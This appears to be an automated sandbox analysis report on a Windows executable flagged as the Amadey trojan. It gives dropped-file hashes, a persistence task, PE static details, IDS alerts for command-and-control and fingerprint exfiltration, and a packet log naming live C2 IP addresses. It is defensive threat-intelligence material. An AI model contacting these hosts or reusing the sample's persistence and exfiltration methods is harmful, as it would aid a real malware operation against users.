                  SHA-256:6DDC4CA7D1E00009CBE54D88B79763CADCA22560E8DB7D4250765F0DA1A85090
                  SHA-512:007FB6B0993A63180D2289875C0131CA4E3FF1AA85E23E783253972D763FFA42A28AD1311E92966E0560BED83C6AA384CD6CCD263ACFD18842BC664A6048B507
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.9.2.4.<./.P.i.

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER4FC5.tmp.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4603
                  Entropy (8bit):4.470068177748451
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zs5Jg77aI9ZCjWpW8VYAYm8M4J0oOqFuO+q87MOC1CBHIN9d:uIjfLI7+S7VMJVffZ1CVIN9d
                  MD5:20EA439536B3BF9AF44BD69FF52616B0
                  SHA1:FB7617A4B3ABCAAB6CEFEA907367DA6E4E56D140
                  SHA-256:AFBEE53A4A4FB0212085D75F47606381F290C1651554812C6DC393E4E3D56B73
                  SHA-512:89CE246BB2AE50F64C7FA3A08D248B9FF268AFD2A3DB97F5C2009D8B5BA1868EB97A716775D360B866EEDE8156E5E947A89E93C9767B54EE1E97335A23B3B3B7
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405037" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe

                  Download File
                  Process:C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):439808
                  Entropy (8bit):5.893749042518846
                  Encrypted:false
                  SSDEEP:6144:mA9KjaHcwQq8DvrqYTs8HinSRR9fYCDX9Y9yTDRLN:mAkjavQjDvt8SRzDYAb
                  MD5:233EA23B1C1587F1CF895F08BA6DA10B
                  SHA1:E2B5131D03AA3BC56A004BA6DEBC6D57322E0691
                  SHA-256:C7E20EAFA32A38282616D78C43C574991D30FE2FBC876141FA76E5FF538C3B5C
                  SHA-512:4F1D72732E8EA42665B325060B1DCBE8BD47B7FB78BA9E9BE9D5DA8C9BE97206BCE8B9FD319A95CD9514FA2FF58EB9194068BDE09AF4BEF0E6D3435562E647A9
                  Malicious:false
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................}......H......|.....E............y......L......K....Rich...................PE..L.....e.....................lA......!............@..........................0E.............................................6..x.....D.(@..........................D7.......................1.......1..@...............|............................text............................... ..`.rdata.../.......0..................@..@.data....@..@...H...,..............@....rsrc...(@....D..B...t..............@..@........................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\3bca58cece\9f93a2

                  Download File
                  Process:C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):439808
                  Entropy (8bit):5.893749042518846
                  Encrypted:false
                  SSDEEP:6144:mA9KjaHcwQq8DvrqYTs8HinSRR9fYCDX9Y9yTDRLN:mAkjavQjDvt8SRzDYAb
                  MD5:233EA23B1C1587F1CF895F08BA6DA10B
                  SHA1:E2B5131D03AA3BC56A004BA6DEBC6D57322E0691
                  SHA-256:C7E20EAFA32A38282616D78C43C574991D30FE2FBC876141FA76E5FF538C3B5C
                  SHA-512:4F1D72732E8EA42665B325060B1DCBE8BD47B7FB78BA9E9BE9D5DA8C9BE97206BCE8B9FD319A95CD9514FA2FF58EB9194068BDE09AF4BEF0E6D3435562E647A9
                  Malicious:false
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................}......H......|.....E............y......L......K....Rich...................PE..L.....e.....................lA......!............@..........................0E.............................................6..x.....D.(@..........................D7.......................1.......1..@...............|............................text............................... ..`.rdata.../.......0..................@..@.data....@..@...H...,..............@....rsrc...(@....D..B...t..............@..@........................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe

                  Download File
                  Process:C:\Users\user\Desktop\file.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):439808
                  Entropy (8bit):5.893749042518846
                  Encrypted:false
                  SSDEEP:6144:mA9KjaHcwQq8DvrqYTs8HinSRR9fYCDX9Y9yTDRLN:mAkjavQjDvt8SRzDYAb
                  MD5:233EA23B1C1587F1CF895F08BA6DA10B
                  SHA1:E2B5131D03AA3BC56A004BA6DEBC6D57322E0691
                  SHA-256:C7E20EAFA32A38282616D78C43C574991D30FE2FBC876141FA76E5FF538C3B5C
                  SHA-512:4F1D72732E8EA42665B325060B1DCBE8BD47B7FB78BA9E9BE9D5DA8C9BE97206BCE8B9FD319A95CD9514FA2FF58EB9194068BDE09AF4BEF0E6D3435562E647A9
                  Malicious:true
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................}......H......|.....E............y......L......K....Rich...................PE..L.....e.....................lA......!............@..........................0E.............................................6..x.....D.(@..........................D7.......................1.......1..@...............|............................text............................... ..`.rdata.../.......0..................@..@.data....@..@...H...,..............@....rsrc...(@....D..B...t..............@..@........................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe:Zone.Identifier

                  Download File
                  Process:C:\Users\user\Desktop\file.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:true
                  Preview:[ZoneTransfer]....ZoneId=0

                  C:\Windows\Tasks\Hkbsse.job

                  Download File
                  Process:C:\Users\user\Desktop\file.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):302
                  Entropy (8bit):3.4076108365068194
                  Encrypted:false
                  SSDEEP:6:0CPtXUhXUEZ+lX1avetE9+AQy0l1FNzt0:RPZ4Q1a/9+nV1Tt0
                  MD5:304F60C96F124ADAC6DDAD50310CF2A8
                  SHA1:42002666D6ACB4B2D818C75C59A8ECAF54E82301
                  SHA-256:F1BFC9386BDB60000B6AB52EECDC6C4A265F294159650F77CA6AFF802B8E96B2
                  SHA-512:7BF7658CACC93ABCEE8D2AB87BB62EBB6C72A71A92B064B565C63A020AFD9AE0B192DBC86D0E5FE23BE0E655BA8ADD0E48A8747D9F49638140D0344DE5734187
                  Malicious:false
                  Preview:.....n)..5.@...b...F.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.3.b.c.a.5.8.c.e.c.e.\.H.k.b.s.s.e...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0.................#.@3P.........................

                  C:\Windows\appcompat\Programs\Amcache.hve

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):1835008
                  Entropy (8bit):4.471258259758481
                  Encrypted:false
                  SSDEEP:6144:czZfpi6ceLPx9skLmb0fjZWSP3aJG8nAgeiJRMMhA2zX4WABluuNDjDH5S:iZHtjZWOKnMM6bFpdj4
                  MD5:486FF979042DA0DFD0B40CC413734C62
                  SHA1:4AC12A54E8C43EBAF32E80D68761985323CB3938
                  SHA-256:7E3FBDC624E4E1B0BEA1F358639EF42201A387F1D30348F4E583D2536E9700F8
                  SHA-512:4B57926D842DF5F701DD1C19E2993DB07D3017F92634327172E976B85B3209699D5EA639A9CC81691515EC2064A3A70C852CE7C42A0FA92085A7A67E6EB8A9E9
                  Malicious:false
                  Preview:regfU...U....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmRK..................................................................................................................................................................................................................................................................................................................................................*.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):5.893749042518846
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:file.exe
                  File size:439'808 bytes
                  MD5:233ea23b1c1587f1cf895f08ba6da10b
                  SHA1:e2b5131d03aa3bc56a004ba6debc6d57322e0691
                  SHA256:c7e20eafa32a38282616d78c43c574991d30fe2fbc876141fa76e5ff538c3b5c
                  SHA512:4f1d72732e8ea42665b325060b1dcbe8bd47b7fb78ba9e9be9d5da8c9be97206bce8b9fd319a95cd9514fa2ff58eb9194068bde09af4bef0e6d3435562e647a9
                  SSDEEP:6144:mA9KjaHcwQq8DvrqYTs8HinSRR9fYCDX9Y9yTDRLN:mAkjavQjDvt8SRzDYAb
                  TLSH:C194F152B5F1C837D1779A372A289A61D53EBD01F774C19B229C022F2EB16D08A39377
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................}.......H.......|.......E...............y.......L.......K.....Rich....................PE..L......e...........

                  File Icon

                  Icon Hash:63796de971436e0f

                  Static PE Info

                  General

                  Entrypoint:0x402197
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:TERMINAL_SERVER_AWARE
                  Time Stamp:0x65A0EF1B [Fri Jan 12 07:49:47 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:def745e62858e9ac0dee4801e550d289

                  Entrypoint Preview

                  Instruction
                  call 00007F5658D1A8F8h
                  jmp 00007F5658D1923Eh
                  push edi
                  mov eax, esi
                  and eax, 0Fh
                  test eax, eax
                  jne 00007F5658D19477h
                  mov edx, ecx
                  and ecx, 7Fh
                  shr edx, 07h
                  je 00007F5658D19417h
                  jmp 00007F5658D193B8h
                  lea ebx, dword ptr [ebx+00000000h]
                  movdqa xmm0, dqword ptr [esi]
                  movdqa xmm1, dqword ptr [esi+10h]
                  movdqa xmm2, dqword ptr [esi+20h]
                  movdqa xmm3, dqword ptr [esi+30h]
                  movdqa dqword ptr [edi], xmm0
                  movdqa dqword ptr [edi+10h], xmm1
                  movdqa dqword ptr [edi+20h], xmm2
                  movdqa dqword ptr [edi+30h], xmm3
                  movdqa xmm4, dqword ptr [esi+40h]
                  movdqa xmm5, dqword ptr [esi+50h]
                  movdqa xmm6, dqword ptr [esi+60h]
                  movdqa xmm7, dqword ptr [esi+70h]
                  movdqa dqword ptr [edi+40h], xmm4
                  movdqa dqword ptr [edi+50h], xmm5
                  movdqa dqword ptr [edi+60h], xmm6
                  movdqa dqword ptr [edi+70h], xmm7
                  lea esi, dword ptr [esi+00000080h]
                  lea edi, dword ptr [edi+00000080h]
                  dec edx
                  jne 00007F5658D19355h
                  test ecx, ecx
                  je 00007F5658D193FBh
                  mov edx, ecx
                  shr edx, 04h
                  test edx, edx
                  je 00007F5658D193C9h
                  lea ebx, dword ptr [ebx+00000000h]
                  movdqa xmm0, dqword ptr [esi]
                  movdqa dqword ptr [edi], xmm0
                  lea esi, dword ptr [esi+10h]
                  lea edi, dword ptr [edi+10h]
                  dec edx
                  jne 00007F5658D193A1h
                  and ecx, 0Fh
                  je 00007F5658D193D6h
                  mov eax, ecx
                  shr ecx, 02h
                  je 00007F5658D193BFh
                  mov edx, dword ptr [esi]
                  mov dword ptr [edi], edx
                  lea esi, dword ptr [esi+04h]
                  lea edi, dword ptr [edi+04h]
                  dec ecx
                  jne 00007F5658D193A5h
                  mov ecx, eax
                  and ecx, 00000000h

                  Rich Headers

                  Programming Language:
                  • [C++] VS2010 build 30319
                  • [ASM] VS2010 build 30319
                  • [ C ] VS2010 build 30319
                  • [IMP] VS2008 SP1 build 30729
                  • [RES] VS2010 build 30319
                  • [LNK] VS2010 build 30319

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x436cc0x78.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x244e0000x4028.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x437440x1c.rdata
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x431f80x18.rdata
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x431b00x40.rdata
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x410000x17c.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x3f7be0x3f8005e6c45c389e975b3511553e29b545a4eFalse0.9538055179625984data7.941071191359724IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata0x410000x2f920x30002f8947136709156b9a322c8c3417beaaFalse0.353515625data5.008260745693812IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0x440000x24093e40x248000a49b2425224ca5219d0fc5da707aeefunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0x244e0000x40280x42008dca4281245eda7b16fec646f0587cdeFalse0.43507339015151514data3.977338616643711IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_ICON0x244e2400x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0JapaneseJapan0.5276497695852534
                  RT_ICON0x244e9080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0JapaneseJapan0.4109958506224066
                  RT_ICON0x2450eb00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0JapaneseJapan0.4521276595744681
                  RT_DIALOG0x24515d00x58data0.8977272727272727
                  RT_STRING0x24516280x51adataJapaneseJapan0.45252679938744256
                  RT_STRING0x2451b480x1b4Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0JapaneseJapan0.5114678899082569
                  RT_STRING0x2451d000x322dataJapaneseJapan0.45885286783042395
                  RT_GROUP_ICON0x24513180x30dataJapaneseJapan0.9375
                  RT_VERSION0x24513480x288data0.5308641975308642

                  Imports

                  DLLImport
                  KERNEL32.dllFindResourceW, LocalCompact, WriteConsoleInputA, GetModuleHandleW, GetWindowsDirectoryA, GetDateFormatA, SetProcessPriorityBoost, LoadLibraryW, FreeConsole, CreateEventA, GetModuleFileNameW, GetACP, IsBadStringPtrA, ReplaceFileA, CreateDirectoryA, GetLastError, SetLastError, SetEndOfFile, GlobalFree, CreateFileMappingA, LocalAlloc, AddVectoredExceptionHandler, GlobalFindAtomW, EnumResourceTypesW, GetWindowsDirectoryW, SetFileAttributesW, RaiseException, HeapReAlloc, HeapAlloc, GetStringTypeW, MultiByteToWideChar, CommConfigDialogA, GetProcAddress, CreateFileA, LCMapStringW, HeapSize, RtlUnwind, Sleep, IsValidCodePage, HeapFree, GetCommandLineA, HeapSetInformation, GetStartupInfoW, IsProcessorFeaturePresent, HeapCreate, SetUnhandledExceptionFilter, ExitProcess, DecodePointer, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, UnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, LeaveCriticalSection, EnterCriticalSection, GetCPInfo, GetOEMCP
                  USER32.dllGetKeyboardLayoutNameA, SetMessageExtraInfo, GetCaretPos, CharUpperBuffA, GetClassInfoW, InsertMenuItemW, ShowCursor
                  ADVAPI32.dllCopySid, ClearEventLogA
                  ole32.dllCoSuspendClassObjects, CoUnmarshalHresult
                  WINHTTP.dllWinHttpOpen

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  JapaneseJapan

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  07/10/24-17:36:06.824712TCP2856147ETPRO TROJAN Amadey CnC Activity M34972580192.168.2.6185.208.158.116
                  07/10/24-17:36:11.618807TCP2856122ETPRO TROJAN Amadey CnC Response M1804972989.23.103.42192.168.2.6
                  07/10/24-17:36:13.149160TCP2044696ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M24973480192.168.2.689.23.103.42

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jul 10, 2024 17:36:06.819170952 CEST4972480192.168.2.689.23.103.42
                  Jul 10, 2024 17:36:06.819199085 CEST4972580192.168.2.6185.208.158.116
                  Jul 10, 2024 17:36:06.819338083 CEST4972680192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:06.824479103 CEST804972489.23.103.42192.168.2.6
                  Jul 10, 2024 17:36:06.824502945 CEST8049725185.208.158.116192.168.2.6
                  Jul 10, 2024 17:36:06.824512005 CEST8049726185.209.162.226192.168.2.6
                  Jul 10, 2024 17:36:06.824584961 CEST4972480192.168.2.689.23.103.42
                  Jul 10, 2024 17:36:06.824609995 CEST4972580192.168.2.6185.208.158.116
                  Jul 10, 2024 17:36:06.824685097 CEST4972680192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:06.824712038 CEST4972580192.168.2.6185.208.158.116
                  Jul 10, 2024 17:36:06.824728012 CEST4972480192.168.2.689.23.103.42
                  Jul 10, 2024 17:36:06.824901104 CEST4972680192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:06.829830885 CEST8049725185.208.158.116192.168.2.6
                  Jul 10, 2024 17:36:06.829858065 CEST804972489.23.103.42192.168.2.6
                  Jul 10, 2024 17:36:06.829865932 CEST8049726185.209.162.226192.168.2.6
                  Jul 10, 2024 17:36:08.420578003 CEST8049726185.209.162.226192.168.2.6
                  Jul 10, 2024 17:36:08.420713902 CEST4972680192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:08.421427965 CEST4972680192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:08.423541069 CEST4972780192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:08.427517891 CEST8049726185.209.162.226192.168.2.6
                  Jul 10, 2024 17:36:08.430056095 CEST8049727185.209.162.226192.168.2.6
                  Jul 10, 2024 17:36:08.430135965 CEST4972780192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:08.430263042 CEST4972780192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:08.435141087 CEST8049727185.209.162.226192.168.2.6
                  Jul 10, 2024 17:36:10.050199032 CEST8049727185.209.162.226192.168.2.6
                  Jul 10, 2024 17:36:10.050427914 CEST4972780192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:10.050429106 CEST4972780192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:10.058446884 CEST8049727185.209.162.226192.168.2.6
                  Jul 10, 2024 17:36:10.166362047 CEST4972880192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:10.171948910 CEST8049728185.209.162.226192.168.2.6
                  Jul 10, 2024 17:36:10.172063112 CEST4972880192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:10.172163010 CEST4972880192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:10.178426981 CEST8049728185.209.162.226192.168.2.6
                  Jul 10, 2024 17:36:10.822652102 CEST4972580192.168.2.6185.208.158.116
                  Jul 10, 2024 17:36:10.822694063 CEST4972480192.168.2.689.23.103.42
                  Jul 10, 2024 17:36:10.822762966 CEST4972880192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:10.823669910 CEST4972980192.168.2.689.23.103.42
                  Jul 10, 2024 17:36:10.823815107 CEST4973080192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:10.827120066 CEST4973180192.168.2.6185.208.158.116
                  Jul 10, 2024 17:36:10.830064058 CEST804972989.23.103.42192.168.2.6
                  Jul 10, 2024 17:36:10.830137014 CEST4972980192.168.2.689.23.103.42
                  Jul 10, 2024 17:36:10.830326080 CEST4972980192.168.2.689.23.103.42
                  Jul 10, 2024 17:36:10.831959963 CEST8049730185.209.162.226192.168.2.6
                  Jul 10, 2024 17:36:10.832015038 CEST4973080192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:10.832125902 CEST4973080192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:10.832304955 CEST8049731185.208.158.116192.168.2.6
                  Jul 10, 2024 17:36:10.832353115 CEST4973180192.168.2.6185.208.158.116
                  Jul 10, 2024 17:36:10.832449913 CEST4973180192.168.2.6185.208.158.116
                  Jul 10, 2024 17:36:10.835223913 CEST804972989.23.103.42192.168.2.6
                  Jul 10, 2024 17:36:10.837117910 CEST8049730185.209.162.226192.168.2.6
                  Jul 10, 2024 17:36:10.837618113 CEST8049731185.208.158.116192.168.2.6
                  Jul 10, 2024 17:36:11.618807077 CEST804972989.23.103.42192.168.2.6
                  Jul 10, 2024 17:36:11.618864059 CEST4972980192.168.2.689.23.103.42
                  Jul 10, 2024 17:36:11.647613049 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:11.647686958 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:11.647782087 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:11.658533096 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:11.658586025 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.121865988 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.122093916 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.437825918 CEST8049730185.209.162.226192.168.2.6
                  Jul 10, 2024 17:36:12.437886000 CEST4973080192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:12.531590939 CEST4973080192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:12.536865950 CEST8049730185.209.162.226192.168.2.6
                  Jul 10, 2024 17:36:12.557276964 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.557318926 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.558290005 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.558366060 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.560880899 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.604507923 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.669075012 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.669112921 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.669224977 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.669251919 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.669251919 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.669290066 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.669313908 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.669334888 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.669512987 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.669691086 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.669722080 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.669764996 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.669773102 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.669819117 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.670299053 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.670479059 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.670511007 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.670555115 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.677952051 CEST4973380192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:12.679316044 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.679383993 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.679439068 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.679490089 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.679533958 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.679580927 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.682739019 CEST8049733185.209.162.226192.168.2.6
                  Jul 10, 2024 17:36:12.682820082 CEST4973380192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:12.682913065 CEST4973380192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:12.688194990 CEST8049733185.209.162.226192.168.2.6
                  Jul 10, 2024 17:36:12.755783081 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.755847931 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.755871058 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.755882025 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.755897999 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.755943060 CEST49732443192.168.2.6188.114.96.3
